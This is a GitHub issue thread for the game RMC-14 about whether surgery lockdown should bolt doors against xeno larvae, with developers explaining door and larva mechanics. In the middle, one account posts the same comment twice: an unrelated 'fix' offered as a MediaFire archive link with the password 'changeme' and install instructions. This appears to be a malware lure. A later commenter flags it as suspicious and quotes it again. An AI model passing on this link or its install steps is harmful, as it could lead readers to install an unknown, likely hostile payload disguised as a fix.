### ISSUE TITLE
Surgery lockdown should bolt the doors too

### ISSUE THREAD

**Issue by DaFieFie** [RMC-14/RMC-14#3907]
To my knowledge larva can't go under doors. This prevents people from feeling the need to put barricades which look absurd outside the surgery doors, and makes a ton of sense in-character. You wouldn't want people just rushing into a surgery room in-character due to contamination/security anyways, and marines know Xenos are an issue and thus should have some reasonable safeguards like this to prevent prepared and thoughtful surgeons from loosing a runner onto the ship.
Larva that escape onto the ship won't stop happening, but they will be more reasonably preventable.

**Comment by Vermidia** [comment]
Wrong: Larva can go under doors

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by blueDev2** [comment]
@QuietlyWhisper @DrSmugleaf Hey um, this link looks suspicious. Also the question doesn't need a link to answer. 

> hi bro, to fix your trouble try this fix, i see it in another issue, https://app.mediafire.com/dqajf1x14ccfd password: changeme when you installing it, you need to place a check in install to path and select usx

**Comment by DaFieFie** [comment]
> Wrong: Larva can go under doors
> 
> There shouldn't be any barricades near surgery anyway, you ain't supposed to build on the ship unless hijack or you know there's a xeno harassing people. I'd only imagine you'd be ok to build a barricade if this problem as happened multiple times.

Bolted doors are supposed to deny larvas last I checked. Also yes, you can build barricades on JUST the doors once you know there's infected marines coming up.

**Comment by Vermidia** [comment]
Nope, bolted doors don't stop them. Only welded ones do

**Comment by DaFieFie** [comment]
> Nope, bolted doors don't stop them. Only welded ones do.
> 
> The other thing is kinda maybe barely passing the rules. I'm not an admin so I'm not 100% sure if you're allowed to or not.

We just discussed this internally which is actually why I made this pr. High security doors from upstream when bolted stop larva, just tested it. So if welding already does this on regular doors perhaps bolting should too tbh.

**Comment by DrSmugleaf** [comment]
> Nope, bolted doors don't stop them. Only welded ones do.
> 
> The other thing is kinda maybe barely passing the rules. I'm not an admin so I'm not 100% sure if you're allowed to or not.

13 or 14? In 14 bolted doors don't stop them, but are supposed to, like 13

https://github.com/user-attachments/assets/fa847b61-d5fc-4985-a1f8-679d9d39b83b

Either way, surgery lockdown isn't actually a lockdown, they are just privacy shutters, a larva is supposed to be able to sneak out of the surgery room if it bursts. There is no button in 13 that bolts those doors, the other one is a manual release so the patient doesn't get stuck in there.
![image](https://github.com/user-attachments/assets/1a1430b5-25cb-4c30-abeb-39f0f7dcfe3c)

The surgery room isn't supposed to be harder to exit as a larva either way, it is actually supposed to be easier than it is right now in 14, there is a scrubber and vent in that room for larva to escape through if they burst in there, and to avoid people powergaming by barricading the doors.

![image](https://github.com/user-attachments/assets/7e59b9c2-4780-4f22-809a-6222187aff88)

**Comment by DrSmugleaf** [comment]
I moved the bolted bit to a new issue here https://github.com/RMC-14/RMC-14/issues/3909
